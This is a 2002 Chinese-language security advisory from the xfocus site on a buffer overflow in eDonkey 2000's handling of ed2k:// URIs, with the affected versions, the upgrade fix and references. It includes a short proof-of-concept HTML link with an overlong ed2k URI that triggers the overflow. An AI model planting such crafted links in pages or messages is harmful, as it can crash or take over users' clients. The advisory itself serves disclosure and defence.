xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version
 最近严重漏洞 
Microsoft RPC接口远程任意代码可执行漏洞
Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞
Microsoft Windows CreateFile API命名管道权限提升漏洞

EDonkey 2000 URI处理缓冲溢出漏洞


发布时间:2002-06-10
更新时间:2002-06-10
严重程度:
威胁程度:普通用户访问权限
错误类型:边界检查错误
利用方式:客户机模式

BUGTRAQ ID:4951

受影响系统
eDonkey 2000 Client 35.16.59 Windows
eDonkey 2000 Client 35.16.60 Windows
详细描述
eDonkey 2000是P-TO-P程序。其中在处理ed2k://时没有很好的对文件段数据进行检查,当处理此类URI时就可以导致eDonkey产生缓冲溢出。

攻击者精心构造这样的连接,eDonkey用户查看时可导致任意代码在用户端执行。

测试代码
<A
href="ed2k://|file|QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQBBBBAAA|1|11111111111111111111111111111111
|">Ed2k Buffer Overflow</A>

解决方案
升级程序:

eDonkey 2000 Client 35.16.59 Windows:

eDonkey 2000 Upgrade eDonkey61.exe
http://www.edonkey2000.com/files/eDonkey61.exe

eDonkey 2000 Client 35.16.60 Windows:

eDonkey 2000 Upgrade eDonkey61.exe
http://www.edonkey2000.com/files/eDonkey61.exe

相关信息
Shane Hird" <shird@dstc.edu.au>.
参考:http://online.securityfocus.com/archive/1/275708
相关主页:http://www.edonkey2000.com/
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved